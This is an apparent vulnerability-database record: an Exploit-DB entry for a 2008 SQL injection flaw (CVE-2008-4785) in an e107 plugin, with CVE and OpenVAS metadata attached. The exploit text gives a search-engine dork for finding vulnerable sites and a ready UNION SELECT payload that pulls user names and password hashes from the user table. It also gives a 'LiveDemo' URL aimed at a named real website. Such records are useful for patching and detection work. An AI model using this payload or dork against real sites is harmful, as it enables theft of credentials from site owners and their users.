{"hash": "82283034598c846d457210f34b52583606eee7a7a97fff237cd0ae82c6b09309", "id": "EDB-ID:6849", "lastseen": "2016-02-01T00:48:22", "enchantments": {"vulnersScore": 6.8}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/6849/", "description": "e107 Plugin alternate_profiles (id) SQL Injection Vulnerability. CVE-2008-4785. Webapps exploit for php platform", "title": "e107 Plugin alternate_profiles id SQL Injection Vulnerability", "sourceData": "#############################################################\ne107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability\n#############################################################\n[~] Author boom3rang\n--------------------------------\n[~] Site www.khg-crew.ws\n--------------------------------\n[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er & Hurley\n--------------------------------\n[!] Script Name: E107\n[!] Plugin Vuln: alternate_profiles/newuser.php?id=\n[!] Dork: inurl:\"/alternate_profiles/\n#############################################################\n\n---------------------------------------------------------------------------------------------------\n[-] POC:\nhttp://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]\n---------------------------------------------------------------------------------------------------\n[-] Exploit:\n-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*\n---------------------------------------------------------------------------------------------------\n[-] LiveDemo:\nhttp://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*\n---------------------------------------------------------------------------------------------------\n#########################################\n- United States of Albania\n- Proud to be Albanian\n- Proud to be Muslim\n#########################################\n\n# milw0rm.com [2008-10-27]\n", "objectVersion": "1.0", "cvelist": ["CVE-2008-4785"], "published": "2008-10-27T00:00:00", "osvdbidlist": ["49451"], "references": [], "reporter": "boom3rang", "modified": "2008-10-27T00:00:00", "href": "https://www.exploit-db.com/exploits/6849/"}

{"result": {"cve": [{"id": "CVE-2008-4785", "type": "cve", "title": "CVE-2008-4785", "description": "SQL injection vulnerability in newuser.php in the alternate_profiles plugin, possibly 0.2, for e107 allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2008-10-29T10:22:38", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4785", "cvelist": ["CVE-2008-4785"], "lastseen": "2017-09-29T14:26:10"}], "openvas": [{"id": "OPENVAS:1361412562310800303", "type": "openvas", "title": "e107 alternate_profiles plugin newuser.php SQL Injection Vulnerability", "description": "This host is running e107 and is prone to remote SQL injection\n vulnerability.", "published": "2008-11-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800303", "cvelist": ["CVE-2008-4785"], "lastseen": "2017-07-02T21:10:09"}]}}